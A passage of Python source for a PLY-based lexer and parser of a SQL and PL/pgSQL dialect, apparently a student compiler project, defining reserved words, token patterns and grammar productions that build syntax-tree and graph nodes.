'DEFAULT',\n 'constraint' : 'CONSTRAINT',\n 'unique' : 'UNIQUE',\n 'check' : 'CHECK',\n 'primary' : 'PRIMARY',\n 'key' : 'KEY',\n 'references' : 'REFERENCES',\n 'foreign' : 'FOREIGN',\n 'add' : 'ADD',\n 'column' : 'COLUMN',\n 'set' : 'SET',\n 'inherits' : 'INHERITS',\n 'insert' : 'INSERT',\n 'into' : 'INTO',\n 'values' : 'VALUES',\n 'update' : 'UPDATE',\n 'delete' : 'DELETE',\n 'distinct' : 'DISTINCT',\n 'group' : 'GROUP',\n 'by' : 'BY',\n 'having' : 'HAVING',\n 'unknown' : 'UNKNOWN',\n 'count' : 'COUNT',\n 'min' : 'MIN',\n 'max' : 'MAX',\n 'sum' : 'SUM',\n 'avg' : 'AVG',\n 'abs' : 'ABS',\n 'cbrt' : 'CBRT',\n 'ceil' : 'CEIL',\n 'ceiling' : 'CEILING',\n 'degrees' : 'DEGREES',\n 'div' : 'DIV',\n 'exp' : 'EXP',\n 'factorial' : 'FACTORIAL',\n 'floor' : 'FLOOR',\n 'gcd' : 'GCD',\n 'lcm' : 'LCM',\n 'ln' : 'LN',\n 'log' : 'LOG',\n 'log10' : 'LOG10',\n 'min_scale' : 'MIN_SCALE',\n 'mod' : 'MOD',\n 'pi' : 'PI',\n 'power' : 'POWER',\n 'radians' : 'RADIANS',\n 'round' : 'ROUND',\n 'scale' : 'SCALE',\n 'sign' : 'SIGN',\n 'sqrt' : 'SQRT',\n 'trim_scale' : 'TRIM_SCALE',\n 'trunc' : 'TRUNC',\n 'width_bucket' : 'WIDTH_BUCKET',\n 'random' : 'RANDOM',\n 'setseed' : 'SETSEED',\n 'acos' : 'ACOS',\n 'acosd' : 'ACOSD',\n 'asin' : 'ASIN',\n 'asind' : 'ASIND',\n 
'atan' : 'ATAN',\n 'atand' : 'ATAND',\n 'atan2' : 'ATAN2',\n 'atan2d' : 'ATAN2D',\n 'cos' : 'COS',\n 'cosd' : 'COSD',\n 'cot' : 'COT',\n 'cotd' : 'COTD',\n 'sin' : 'SIN',\n 'sind' : 'SIND',\n 'tan' : 'TAN',\n 'tand' : 'TAND',\n 'sinh' : 'SINH',\n 'cosh' : 'COSH',\n 'tanh' : 'TANH',\n 'asinh' : 'ASINH',\n 'acosh' : 'ACOSH',\n 'atanh' : 'ATANH',\n 'length' : 'LENGTH',\n 'substring' : 'SUBSTRING',\n 'trim' : 'TRIM',\n 'get_byte' : 'GET_BYTE',\n 'md5' : 'MD5',\n 'set_byte' : 'SET_BYTE',\n 'sha256' : 'SHA256',\n 'substr' : 'SUBSTR',\n 'convert' : 'CONVERT',\n 'encode' : 'ENCODE',\n 'decode' : 'DECODE',\n 'any' : 'ANY',\n 'all' : 'ALL',\n 'some' : 'SOME',\n 'asc' : 'ASC',\n 'desc' : 'DESC',\n 'case' : 'CASE',\n 'when' : 'WHEN',\n 'then' : 'THEN',\n 'else' : 'ELSE',\n 'end' : 'END',\n 'greatest' : 'GREATEST',\n 'least' : 'LEAST',\n 'order' : 'ORDER',\n 'limit' : 'LIMIT',\n 'offset' : 'OFFSET',\n 'union' : 'UNION',\n 'intersect' : 'INTERSECT',\n 'except' : 'EXCEPT',\n 'inner' : 'INNER',\n 'left' : 'LEFT',\n 'right' : 'RIGHT',\n 'full' : 'FULL',\n 'outer' : 'OUTER',\n 'join' : 'JOIN',\n 'on' : 'ON',\n 'using' : 'USING',\n 'natural' : 'NATURAL',\n 'first' : 'FIRST',\n 'last' : 'LAST',\n 'nulls' : 'NULLS',\n 'use' : 'USE',\n 'constant' : 'CONSTANT',\n 'collate' : 'COLLATE',\n 'function' : 'FUNCTION',\n 'begin' : 'BEGIN',\n 'return' : 'RETURN',\n 'returns' : 'RETURNS',\n 'alias' : 'ALIAS',\n 'for' : 'FOR',\n 'language' : 'LANGUAGE',\n 'out' : 'OUT',\n 'declare' : 'DECLARE',\n 'rowtype' : 'ROWTYPE',\n 'record' : 'RECORD',\n 'prepare' : 'PREPARE',\n 'perform' : 'PERFORM',\n 'found' : 'FOUND',\n 'raise' : 'RAISE',\n 'no_data_found' : 'NO_DATA_FOUND',\n 'too_many_rows' : 'TOO_MANY_ROWS',\n 'execute' : 'EXECUTE',\n 'get' : 'GET',\n 'notice' : 'NOTICE',\n 'elsif' : 'ELSIF',\n 'exception' : 'EXCEPTION',\n 'plpgsql' : 'PLPGSQL',\n 'diagnostics' : 'DIAGNOSTICS',\n 'inout' : 'INOUT',\n 'cascade' : 'CASCADE',\n 'restrict' : 'RESTRICT',\n 'index' : 'INDEX',\n 'hash' : 'HASH',\n 'procedure' : 'PROCEDURE',\n 'concurrently' : 'CONCURRENTLY',\n 'tablespace' : 'TABLESPACE',\n 'attach' : 'ATTACH',\n 'partition' : 'PARTITION',\n 'depends' : 'DEPENDS',\n 'extension' : 'EXTENSION',\n 'reset' : 'RESET',\n 'statistics' : 'STATISTICS',\n 'lower' : 'LOWER',\n \n}\n\ntokens = [\n 'PARA',\n 'PARC',\n 'CORCHA',\n 'CORCHC',\n 'PUNTO',\n 'COMA',\n 'PUNTOCOMA',\n 'DOSPUNTOS',\n 'MAS',\n 'MENOS',\n 'POR',\n 'DIAGONAL',\n 'EXPONENCIANCION',\n 'PORCENTAJE',\n 'MAYOR',\n 'MENOR',\n 'IGUAL',\n 'MAYORQ',\n 'MENORQ',\n 'DIFERENTE',\n 'ENTERO',\n 'FLOAT',\n 'TEXTO',\n 'FECHA_HORA',\n 'PATTERN_LIKE',\n 'BOOLEAN_VALUE',\n 'ID',\n 'SQUARE_ROOT',\n 'CUBE_ROOT',\n 'AMPERSON',\n 'NUMERAL',\n 'PRIME',\n 'SHIFT_L',\n 'SHIFT_R',\n 'DOLLAR',\n] +list(reserved.values()) \n\nt_PARA = r'\\('\nt_PARC = r'\\)'\nt_CORCHA = r'\\['\nt_CORCHC = r'\\]'\nt_PUNTO = r'\\.'\nt_COMA = r'\\,'\nt_PUNTOCOMA = r'\\;'\nt_DOSPUNTOS = r'\\:'\nt_MAS = r'\\+'\nt_MENOS = r'\\-'\nt_POR = r'\\*'\nt_DIAGONAL = r'\\/'\nt_EXPONENCIANCION = r'\\^'\nt_PORCENTAJE = r'%'\nt_DOLLAR = r'\\$'\nt_MAYOR = r'>'\nt_MENOR = r'<'\nt_IGUAL = r'='\nt_MAYORQ = r'>='\nt_MENORQ = r'<='\nt_SQUARE_ROOT = r'\\|'\nt_CUBE_ROOT = r'\\|\\|'\nt_AMPERSON = r'\\&'\nt_NUMERAL = r'\\#'\nt_PRIME = r'\\~'\nt_SHIFT_L = r'<<'\nt_SHIFT_R = r'>>'\n\n# ignored regular expressions\nt_ignore = \" \\t\"\nt_ignore_COMMENT = r'\\-\\-.*'\nt_ignore_COMMENTMULTI = r'(/\\*(.|\\n)*?\\*/)|(//.*)'\n\n\ndef t_DIFERENTE(t):\n r'((<>)|(!=))'\n t.type = reserved.get(t.value, 'DIFERENTE')\n return t\n\n\ndef t_FLOAT(t):\n 
r'((\\d+\\.\\d*)((e[\\+-]?\\d+)?)|(\\d*e[\\+-]?\\d+))'\n t.value = float(t.value)\n return t\n\n\ndef t_ENTERO(t):\n r'\\d+'\n t.value = int(float(t.value))\n return t\n\n\ndef t_FECHA_HORA(t):\n r'\\'\\d{4}-[0-1]?\\d-[0-3]?\\d [0-2]\\d:[0-5]\\d:[0-5]\\d\\''\n t.value = t.value[1:-1]\n t.type = reserved.get(t.value, 'FECHA_HORA')\n return t\n\n\ndef t_PATTERN_LIKE(t):\n r'\\'\\%.*\\%\\''\n t.value = t.value[2:-2]\n t.type = reserved.get(t.value, 'PATTERN_LIKE')\n return t\n\n\ndef t_TEXTO(t):\n r'\\'([^\\\\\\n]|(\\\\.))*?\\''\n t.value = t.value[1:-1]\n t.type = 'TEXTO'\n return t\n\n\ndef t_BOOLEAN_VALUE(t):\n r'((false)|(true))'\n t.value = t.value.lower()\n t.type = reserved.get(t.value, 'BOOLEAN_VALUE')\n return t\n\n\ndef t_ID(t):\n r'[a-zA-Z_][a-zA-Z_0-9]*'\n t.type = reserved.get(t.value.lower(), 'ID')\n return t\n\n\ndef t_newline(t):\n r'\\n+'\n t.lexer.lineno += t.value.count(\"\\n\")\n\n\ndef t_error(t):\n err = Error(t.lineno, t.lexpos, ErrorType.LEXICAL, 'Ilegal character \\'' + t.value[0] + '\\'')\n errorsList.append(err)\n t.lexer.skip(1)\n\n\nlexer = lex.lex(debug=False, reflags=re.IGNORECASE)\n\n# ===========================================================================================\n# ==================================== SYNTACTIC ANALYSIS ==================================\n# ===========================================================================================\n\nstart = 'init'\n\nprecedence = (\n\n # Arthmetic\n ('left', 'MAS', 'MENOS'),\n ('left', 'POR', 'DIAGONAL'),\n ('left', 'EXPONENCIANCION'),\n ('right', 'UMENOS'),\n ('right', 'UMAS'),\n # Relational\n ('left', 'MENOR', 'MAYOR', 'IGUAL', 'MENORQ', 'MAYORQ'),\n # logic\n ('left', 'OR'),\n ('left', 'AND'),\n ('right', 'NOT'),\n ('left', 'AS')\n)\n\n\ndef p_init(t):\n ''' init : statements'''\n t[0] = t[1]\n\n\n# ===================================== SQL =====================================\n\ndef p_statements(t):\n ''' statements : statements statement '''\n t[1].append(t[2])\n t[0] = t[1]\n\n\ndef p_statements2(t):\n ''' statements : statement '''\n t[0] = [t[1]]\n\n\ndef p_statement(t):\n '''statement : stm_show PUNTOCOMA\n | stm_create PUNTOCOMA\n | stm_alter PUNTOCOMA\n | stm_use_db PUNTOCOMA\n | stm_select PUNTOCOMA\n | stm_insert PUNTOCOMA\n | stm_update PUNTOCOMA\n | stm_delete PUNTOCOMA\n | stm_drop PUNTOCOMA\n | stm_select UNION all_opt stm_select PUNTOCOMA\n | stm_select INTERSECT all_opt stm_select PUNTOCOMA\n | stm_select EXCEPT all_opt stm_select PUNTOCOMA\n | asig_basica PUNTOCOMA\n | stm_perform PUNTOCOMA \n | stm_begin PUNTOCOMA\n | stm_if PUNTOCOMA \n | stm_create_function PUNTOCOMA \n | stm_execute PUNTOCOMA \n | stm_get PUNTOCOMA \n | stm_drop_function PUNTOCOMA\n | stm_index PUNTOCOMA\n | stm_drop_index PUNTOCOMA\n | stm_alter_index PUNTOCOMA\n | stm_create_procedure PUNTOCOMA\n | stm_drop_procedure PUNTOCOMA \n '''\n\n # | stm_select PUNTOCOMA\n # | stm_select UNION all_opt stm_select\n # | stm_select INTERSECT all_opt stm_select\n # | stm_select EXCEPT all_opt\n try:\n if len(t) == 3:\n punteroinicio(t[1].graph_ref)\n except:\n print(\"falta parametro graph_ref\")\n if len(t) == 3:\n t[0] = t[1]\n else:\n token_op = t.slice[2]\n graph_ref = None\n if token_op.type == 'UNION':\n childsProduction = addNotNoneChild(t, [1, 3, 4])\n graph_ref = graph_node(str(\"stm_union\"), [t[1], t[2], t[3], t[4]], childsProduction)\n punteroinicio(graph_ref)\n addCad(\"**\\** ::= \\ tUnion \\ \\ \")\n t[0] = Union(t[1], t[4], True if t[3] is not None else False, token_op.lineno, token_op.lexpos, 
graph_ref)\n if token_op.type == 'INTERSECT':\n childsProduction = addNotNoneChild(t, [1, 3, 4])\n graph_ref = graph_node(str(\"stm_intersect\"), [t[1], t[2], t[3], t[4]], childsProduction)\n punteroinicio(graph_ref)\n addCad(\"**\\** ::= \\ tIntersect \\ \\ \")\n t[0] = Intersect(t[1], t[4], True if t[3] is not None else False, token_op.lineno, token_op.lexpos, graph_ref)\n if token_op.type == 'EXCEPT':\n childsProduction = addNotNoneChild(t, [1, 3, 4])\n graph_ref = graph_node(str(\"stm_except\"), [t[1], t[2], t[3], t[4]], childsProduction)\n punteroinicio(graph_ref)\n addCad(\"**\\** ::= \\ tExcept \\ \\ \")\n t[0] = Except(t[1], t[4], True if t[3] is not None else False, token_op.lineno, token_op.lexpos, graph_ref)\n\n\ndef p_statement_error(t):\n '''statement : error PUNTOCOMA\n '''\n token = t.slice[1]\n t[0] = Error(token.lineno, token.lexpos, ErrorType.SYNTAX, 'Ilegal token ' + str(token.lineno))\n\n\n#################\n# Parte de PGSQL\n\n\ndef p_asig_basica(t):\n '''asig_basica : ID sig_asignacion valor_asignacion\n ''' \n childsProduction = addNotNoneChild(t,[2,3])\n graph_ref = graph_node(str(\"asig_basica\"), [t[1], t[2],t[3]] , childsProduction)\n addCad(\"**\\** ::= tIdentifier \\ \\ \")\n t[0] = Declaration(t[1], False, None, True, t[3], None, t.slice[1].lineno, t.slice[1].lexpos, graph_ref)\n\n\ndef p_sig_asignacion(t):\n '''sig_asignacion : DOSPUNTOS IGUAL\n | IGUAL'''\n if len(t) == 3:\n graph_ref = graph_node(str(t[1] + \" \" + t[2]))\n addCad(\"**\\** ::= tDospuntos tIgual \")\n t[0] = upNodo(\"token\", 0, 0, graph_ref)\n ##### \n elif len(t) == 2:\n graph_ref = graph_node(str(t[1]))\n addCad(\"**\\** ::= tIgual \")\n t[0] = upNodo(\"token\", 0, 0, graph_ref)\n ##### \n\ndef p_valor_asignacion(t):\n '''valor_asignacion : expression\n | PARA statements_sql PARC'''\n if len(t) == 2:\n #NoDEScomentar\n #childsProduction = addNotNoneChild(t,[1])\n #graph_ref = graph_node(str(\"expression\"), [t[1]] , childsProduction)\n addCad(\"**\\** ::= \\ \")\n #t[1].graph_ref = graph_ref\n t[0] = t[1]\n ##### \n elif len(t) == 4:\n childsProduction = addNotNoneChild(t,[2])\n graph_ref = graph_node(str(\"valor_asignacion\"), [t[1], t[2], t[3]],childsProduction )\n addCad(\"**\\** ::= '(' \\ ')' \")\n t[2].graph_ref = graph_ref\n t[0] = t[2]\n\n\ndef p_stm_perform(t):\n '''stm_perform : PERFORM ID PARA TEXTO COMA ID PARC '''\n\n if len(t) == 8:\n graph_ref = graph_node(str(\"stm_perform\"), [t[1], t[2], t[3], t[4], t[5], t[6],t[7]] ,[])\n addCad(\"**\\** ::= tPerform tIdentifier PARA tTexto ',' tIdentifier ')' \")\n t[0] = upNodo(\"token\", 0, 0, graph_ref)\n #####\n else:\n t[0]=None\n\n\n\ndef p_stm_if(t):\n '''stm_if : IF condition THEN if_inst elsif_opt else_opt END IF '''\n childsProduction = addNotNoneChild(t,[2,6])\n lista = None\n if t[4] != None:\n lista = t[4][0]\n childsProduction.append(lista.graph_ref)\n lista2 = None\n if t[5] != None:\n lista2 = t[5]\n childsProduction.append(lista2.graph_ref)\n graph_ref = graph_node(str(\"stm_if\"), [t[1], t[2], t[3], lista,lista2,t[6],t[7],t[8]], childsProduction)\n addCad(\"**\\** ::= tIf \\ THEN [\\] [\\] [\\] tEnd tIf ';' \")\n t[0] = IfNode(t[2], t[4], t[5], t[6], t.slice[1].lineno, t.slice[1].lexpos,graph_ref)\n\ndef p_condition(t):\n '''condition : NOT FOUND\n | predicateExpression \n '''\n\n\n if len(t) == 3:\n graph_ref = graph_node(str(\"condition\"), [t[1], t[2]],[])\n addCad(\"**\\** ::= tNot tFound \")\n t[0] = upNodo(\"token\", 0, 0, graph_ref)\n #print(t)\n elif len(t) == 2:\n addCad(\"**\\** ::= [\\] \")\n t[0] = t[1]\n 
#print(t)\n\n\n\ndef p_elsif_opt(t):\n '''elsif_opt : elsif_opt ELSIF condition THEN if_inst '''\n\n\n if len(t) == 6:\n childsProduction = addNotNoneChild(t,[3])\n lista = None\n if t[1] != None:\n lista = t[1][0]\n childsProduction.append(lista.graph_ref)\n lista2 = None\n if t[5] != None:\n lista2 = t[5][0]\n childsProduction.append(lista2.graph_ref)\n graph_ref = graph_node(str(\"elsif_opt\"), [lista, t[2], t[3], t[4], lista2],childsProduction )\n addCad(\"**\\** ::= \\ tElsIf \\ tThen \\ \")\n t[0] = IfNode(t[3], t[5], None, None, t.slice[2].lineno, t.slice[2].lexpos, graph_ref)\n \n\ndef p_elsif_opt0(t):\n '''elsif_opt : empty '''\n t[0] = None\n #print(t)\n\n\n\n\ndef p_else_opt(t):\n '''else_opt : ELSE if_inst '''\n\n\n if len(t) == 3: \n lista = None\n childsProduction = []\n if t[2] != None:\n lista = t[2][0]\n childsProduction.append(lista.graph_ref)\n graph_ref = graph_node(str(\"else_opt\"), [t[1], lista], childsProduction )\n addCad(\"**\\** ::= tElse \\ \")\n t[0] = ElseNode(t[2], t.slice[1].lineno, t.slice[1].lexpos, graph_ref)\n \n\ndef p_else_opt0(t):\n '''else_opt : empty '''\n t[0] = None\n #print(t)\n\n\n\n\n\n\n#TODO @ESTEBAN produccion 4 y 5\ndef p_if_inst(t):\n '''if_inst : if_inst statements_sql PUNTOCOMA\n | if_inst raise_op\n | if_inst asig_basica PUNTOCOMA\n | if_inst return_ PUNTOCOMA\n | if_inst stm_if PUNTOCOMA\n '''\n graph_ref = ''\n token = t.slice[2]\n if token.type == \"statements_sql\":\n childsProduction = addNotNoneChild(t,[2])\n lista = None\n if t[1] != None:\n lista = t[1][0]\n childsProduction.append(lista.graph_ref)\n graph_ref = graph_node(str(\"if_inst\"), [lista, t[2]],childsProduction )\n addCad(\"**\\** ::= \\ \\ ';' \")\n t[0] = [upNodo(\"token\", 0, 0, graph_ref)]\n #print(t)\n elif token.type == \"raise_op\":\n childsProduction = addNotNoneChild(t,[2])\n lista = None\n if t[1] != None:\n lista = t[1][0]\n childsProduction.append(lista.graph_ref)\n graph_ref = graph_node(str(\"if_inst\"), [lista, t[2]],childsProduction )\n addCad(\"**\\** ::= \\ \\ \")\n t[0] = [upNodo(\"token\", 0, 0, graph_ref)]\n #print(t)\n elif token.type == \"asig_basica\":\n lista = None\n childsProduction = addNotNoneChild(t,[2])\n if t[1] != None:\n lista = t[1][0]\n childsProduction.append(lista.graph_ref)\n graph_ref = graph_node(str(\"if_inst\"), [lista, t[2], t[3]], childsProduction)\n addCad(\"**\\** ::= \\ \\ ';' \")\n ############\n elif token.type == \"return_\":\n lista = None\n childsProduction = addNotNoneChild(t,[2])\n if t[1] != None:\n lista = t[1][0]\n childsProduction.append(lista.graph_ref)\n graph_ref = graph_node(str(\"if_inst\"), [lista, t[2]],childsProduction )\n addCad(\"**\\** ::= \\ \\ ';' \")\n elif token.type == \"stm_if\":\n childsProduction = addNotNoneChild(t,[2])\n lista = None\n if t[1] != None:\n lista = t[1][0]\n childsProduction.append(lista.graph_ref)\n graph_ref = graph_node(str(\"if_inst\"), [lista, t[2]],childsProduction )\n addCad(\"**\\** ::= \\ \\ ';' \") \n\n \n if t[1] is None:\n t[2].graph_ref= graph_ref\n t[0] = [t[2]] \n else:\n t[1][0].graph_ref = graph_ref\n t[1].append(t[2])\n t[0] = t[1] \n\n\n\n\ndef p_if_inst0(t):\n '''if_inst : empty '''\n\n t[0]= None\n\n\n# TODO @ESTEBAN tener en cuenta que el return esta como None\ndef p_stm_begin(t):\n '''stm_begin : declares_opt BEGIN statements_begin exception_opt return_opt END if_opt '''\n lista = None\n childsProduction = addNotNoneChild(t,[4,5,7])\n if t[1] != None:\n lista = t[1][0]\n childsProduction.append(lista.graph_ref)\n ret = t[5]\n lista2 = None\n if t[3] != 
None:\n lista2 = t[3][0]\n childsProduction.append(lista2.graph_ref)\n graph_ref = graph_node(str(\"stm_begin\"), [lista, t[2], lista2, t[4], t[5],t[6] ,t[7]],childsProduction )\n addCad(\"**\\** ::= [\\] tBegin \\ [\\] [\\] tEnd [\\] \")\n t[0] = FunctionBody(t[1], t[3], t[4], ret, t.slice[2].lineno, t.slice[2].lexpos, graph_ref)\n\n\n\ndef p_statements_begin(t):\n '''statements_begin : statements_begin statements_sql PUNTOCOMA\n | statements_begin stm_if PUNTOCOMA \n | statements_begin asig_basica PUNTOCOMA\n | statements_begin stm_case PUNTOCOMA \n | statements_begin return_ PUNTOCOMA ''' \n token = t.slice[2]\n if token.type == \"statements_sql\":\n childsProduction = addNotNoneChild(t,[2])\n lista = None\n if t[1] != None:\n lista = t[1][0]\n childsProduction.append(lista.graph_ref)\n graph_ref = graph_node(str(\"statements_begin\"), [lista, t[2]],childsProduction )\n addCad(\"**\\** ::= \\ \\ ';' \")\n if t[1] is None:\n t[2].graph_ref = graph_ref\n t[0] = [t[2]] \n else:\n t[1][0].graph_ref = graph_ref\n t[1].append(t[2])\n t[0] = t[1]\n \n elif token.type == \"stm_if\":\n childsProduction = addNotNoneChild(t,[2])\n lista = None\n if t[1] != None:\n lista = t[1][0]\n childsProduction.append(lista.graph_ref)\n graph_ref = graph_node(str(\"statements_begin\"), [lista, t[2]],childsProduction )\n addCad(\"**\\** ::= \\ \\ ';' \") \n if t[1] is None:\n t[2].graph_ref = graph_ref\n t[0] = [t[2]] \n else:\n t[1][0].graph_ref = graph_ref\n t[1].append(t[2])\n t[0] = t[1]\n\n elif token.type == \"asig_basica\":\n lista = None\n childsProduction = addNotNoneChild(t,[2])\n if t[1] != None:\n lista = t[1][0]\n childsProduction.append(lista.graph_ref)\n graph_ref = graph_node(str(\"statements_begin\"), [lista, t[2]],childsProduction )\n addCad(\"**\\** ::= \\ \\ ';' \")\n if t[1] is None:\n t[2].graph_ref = graph_ref\n t[0] = [t[2]] \n else:\n t[1][0].graph_ref = graph_ref\n t[1].append(t[2])\n t[0] = t[1] \n elif token.type == \"stm_case\":\n childsProduction = addNotNoneChild(t,[2])\n lista = None\n if t[1] != None:\n lista = t[1][0]\n childsProduction.append(lista.graph_ref)\n graph_ref = graph_node(str(\"statements_begin\"), [lista, t[2]],childsProduction )\n addCad(\"**\\** ::= \\ \\ ';' \")\n if t[1] is None:\n t[2].graph_ref = graph_ref\n t[0] = [t[2]] \n else:\n t[1][0].graph_ref = graph_ref\n t[1].append(t[2])\n t[0] = t[1]\n elif token.type == \"return_\":\n lista = None\n childsProduction = addNotNoneChild(t,[2])\n if t[1] != None:\n lista = t[1][0]\n childsProduction.append(lista.graph_ref)\n graph_ref = graph_node(str(\"statements_begin\"), [lista, t[2]],childsProduction )\n addCad(\"**\\** ::= \\ \\ ';' \")\n if t[1] is None:\n t[2].graph_ref = graph_ref\n t[0] = [t[2]] \n else:\n t[1][0].graph_ref = graph_ref\n t[1].append(t[2])\n t[0] = t[1] \n \n\n\n \n\ndef p_statements_begin0(t):\n '''statements_begin : empty '''\n t[0]= None\n\n\ndef p_return_(t):\n '''return_ : RETURN logicExpression '''\n childsProduction = addNotNoneChild(t,[2])\n graph_ref = graph_node(str(\"return_\"), [t[1], t[2]], childsProduction )\n addCad(\"**\\** ::= tReturn \\ \")\n t[0] = Return(t[2], t.slice[1].lineno, t.slice[1].lexpos, graph_ref)\n\n\ndef p_exception_opt(t):\n '''exception_opt : EXCEPTION when_opt '''\n\n\n if len(t) == 3:\n childsProduction = addNotNoneChild(t,[2])\n graph_ref = graph_node(str(\"exception_opt\"), [t[1], t[2]],childsProduction )\n addCad(\"**\\** ::= tException [\\] \")\n t[0] = upNodo(\"token\", 0, 0, graph_ref)\n #print(t)\n\ndef p_exception_opt1(t):\n '''exception_opt : 
empty '''\n t[0] =None\n\n\ndef p_when_opt(t):\n '''when_opt : when_opt WHEN atr_when then_op\n | WHEN atr_when then_op\n | WHEN '''\n \n token = t.slice[1]\n if len(t) == 5:\n childsProduction = addNotNoneChild(t,[1,3,4])\n graph_ref = graph_node(str(\"when_opt\"), [t[1], t[2],t[3],t[4]],childsProduction )\n addCad(\"**\\** ::= \\ tWhen \\ [\\] \")\n t[0] = upNodo(\"token\", 0, 0, graph_ref)\n #print(t)\n elif len(t) == 4:\n childsProduction = addNotNoneChild(t,[2,3])\n graph_ref = graph_node(str(\"when_opt\"), [t[1], t[2],t[3]],childsProduction )\n addCad(\"**\\** ::= tWhen \\ [\\] \")\n t[0] = upNodo(\"token\", 0, 0, graph_ref)\n #print(t)\n elif token.type == \"WHEN\" and len(t)==2:\n graph_ref = graph_node(str(\"when_opt\"), [t[1]],[] )\n addCad(\"**\\** ::= tWhen \")\n t[0] = upNodo(\"token\", 0, 0, graph_ref)\n #print(t)\n\n\ndef p_when_opt0(t):\n '''when_opt : empty '''\n t[0]= None\n\n\ndef p_atr_when(t):\n '''atr_when : NO_DATA_FOUND\n | TOO_MANY_ROWS\n | ID '''\n token = t.slice[1]\n if token.type == \"NO_DATA_FOUND\" :\n graph_ref = graph_node(str(\"atr_when\"), [t[1]],[] )\n addCad(\"**\\** ::= tNo_data_found \")\n t[0] = upNodo(\"token\", 0, 0, graph_ref)\n #print(t)\n elif token.type == \"TOO_MANY_ROWS\" :\n graph_ref = graph_node(str(\"atr_when\"), [t[1]],[] )\n addCad(\"**\\** ::= tToo_many_rows \")\n t[0] = upNodo(\"token\", 0, 0, graph_ref)\n #print(t)\n elif token.type == \"ID\" :\n graph_ref = graph_node(str(\"atr_when\"), [t[1]],[] )\n addCad(\"**\\** ::= tIdentifier \")\n t[0] = upNodo(\"token\", 0, 0, graph_ref)\n #print(t)\n\n\ndef p_then_op(t):\n ''' then_op : THEN raise_op \n '''\n if len(t) == 3:\n childsProduction = addNotNoneChild(t,[2])\n graph_ref = graph_node(str(\"then_op\"), [t[1],t[2]], childsProduction )\n addCad(\"**\\** ::= tTHEN \\ \")\n t[0] = upNodo(\"token\", 0, 0, graph_ref)\n #print(t)\n\n\n\ndef p_then_op1(t):\n ''' then_op : THEN NULL PUNTOCOMA\n '''\n\n\n if len(t) == 4:\n graph_ref = graph_node(str(\"then_op\"), [t[1],t[2],t[3]], [] )\n addCad(\"**\\** ::= tThen tNull \")\n t[0] = upNodo(\"token\", 0, 0, graph_ref)\n #print(t)\n\n\ndef p_raise_op(t):\n ''' raise_op : RAISE atr_raise TEXTO COMA col_name PUNTOCOMA\n | RAISE atr_raise TEXTO PUNTOCOMA'''\n\n token = t.slice[1]\n if len(t) == 7:\n childsProduction = addNotNoneChild(t,[2,5])\n graph_ref = graph_node(str(\"raise_op\"), [t[1],t[2],t[3],t[4],t[5],t[6]], childsProduction )\n addCad(\"**\\** ::= tRaise \\ tTexto ',' \\ ';' \")\n t[0] = upNodo(\"token\", 0, 0, graph_ref)\n #print(t)\n elif len(t) == 5:\n childsProduction = addNotNoneChild(t,[2])\n graph_ref = graph_node(str(\"raise_op\"), [t[1],t[2],t[3],t[4]], childsProduction )\n addCad(\"**\\** ::= tRaise \\ tTexto ';' \")\n t[0] = upNodo(\"token\", 0, 0, graph_ref)\n #print(t)\n\ndef p_raise_op1(t):\n ''' raise_op : empty '''\n t[0] = None\n #print(t)\n\n\n\ndef p_atr_raise(t):\n '''atr_raise : NOTICE\n | EXCEPTION\n | ID '''\n\n token = t.slice[1]\n if token.type == \"NOTICE\" :\n graph_ref = graph_node(str(\"atr_when\"), [t[1]],[] )\n addCad(\"**\\** ::= tNotice \")\n t[0] = upNodo(\"token\", 0, 0, graph_ref)\n #print(t)\n elif token.type == \"TOO_MANY_ROWS\" :\n graph_ref = graph_node(str(\"atr_when\"), [t[1]],[] )\n addCad(\"**\\** ::= tException \")\n t[0] = upNodo(\"token\", 0, 0, graph_ref)\n #print(t)\n elif token.type == \"ID\" :\n graph_ref = graph_node(str(\"atr_when\"), [t[1]],[] )\n addCad(\"**\\** ::= tIdentifier \")\n t[0] = upNodo(\"token\", 0, 0, graph_ref)\n #print(t)\n\n\n\n\ndef p_return_opt(t):\n '''return_opt : 
RETURN logicExpression PUNTOCOMA '''\n\n\n if len(t) == 4:\n childsProduction = addNotNoneChild(t,[2])\n graph_ref = graph_node(str(\"return_opt\"), [t[1], t[2], t[3]], childsProduction )\n addCad(\"**\\** ::= tReturn \\ ';' \")\n t[0] = Return(t[2], t.slice[1].lineno, t.slice[1].lexpos, graph_ref)\n #print(t)\n\n\ndef p_return_opt0(t):\n '''return_opt : empty '''\n t[0]=None\n\n\n\n\n\ndef p_stm_execute(t):\n '''stm_execute : EXECUTE TEXTO INTO ID USING group_list \n | EXECUTE ID PARA TEXTO COMA column_list PARC INTO ID USING group_list\n | EXECUTE ID PARA TEXTO TEXTO COMA column_list PARC INTO ID USING group_list\n | EXECUTE ID PARA TEXTO COMA column_list PARC USING group_list\n | EXECUTE ID PARA TEXTO TEXTO COMA column_list PARC USING group_list \n | EXECUTE ID PARA TEXTO COMA column_list PARC \n | EXECUTE expression\n | EXECUTE ID PARA exp_list PARC\n | EXECUTE ID PARA PARC\n '''\n\n token = t.slice[1]\n if len(t) == 7:\n childsProduction = addNotNoneChild(t,[6])\n graph_ref = graph_node(str(\"STM_EXECUTE\"), [t[1], t[2],t[3],t[4],t[5],t[6]],childsProduction )\n addCad(\"**\\** ::= tExecute TEXTO tInto tIdentifier tUsing \\ \")\n t[0] = upNodo(\"token\", 0, 0, graph_ref)\n #print(t)\n elif len(t) == 12:\n childsProduction = addNotNoneChild(t,[11])\n lista = None\n if t[6] != None:\n lista = t[6][0]\n childsProduction.append(lista.graph_ref)\n graph_ref = graph_node(str(\"STM_EXECUTE\"), [t[1], t[2],t[3],t[4],t[5],lista,t[7],t[8],t[9],t[10],t[11]],childsProduction )\n addCad(\"**\\** ::= tExecute tIdentifier ‘(’ TEXTO ‘,’ \\ ’)’ tInto tIdentifier tUsing \\ \")\n t[0] = upNodo(\"token\", 0, 0, graph_ref)\n #print(t)\n elif len(t) == 13:\n childsProduction = addNotNoneChild(t,[12])\n lista = None\n if t[7] != None:\n lista = t[7][0]\n childsProduction.append(lista.graph_ref)\n graph_ref = graph_node(str(\"STM_EXECUTE\"), [t[1], t[2],t[3],t[4],t[5],t[6],lista,t[8],t[9],t[10],t[11],t[12]],childsProduction )\n addCad(\"**\\** ::= tExecute tIdentifier ‘(’ TEXTO TEXTO ‘,’ \\ ’)’ tInto tIdentifier tUsing \\ \")\n t[0] = upNodo(\"token\", 0, 0, graph_ref)\n #print(t)\n elif len(t) == 10:\n childsProduction = addNotNoneChild(t,[9])\n lista = None\n if t[6] != None:\n lista = t[6][0]\n childsProduction.append(lista.graph_ref)\n graph_ref = 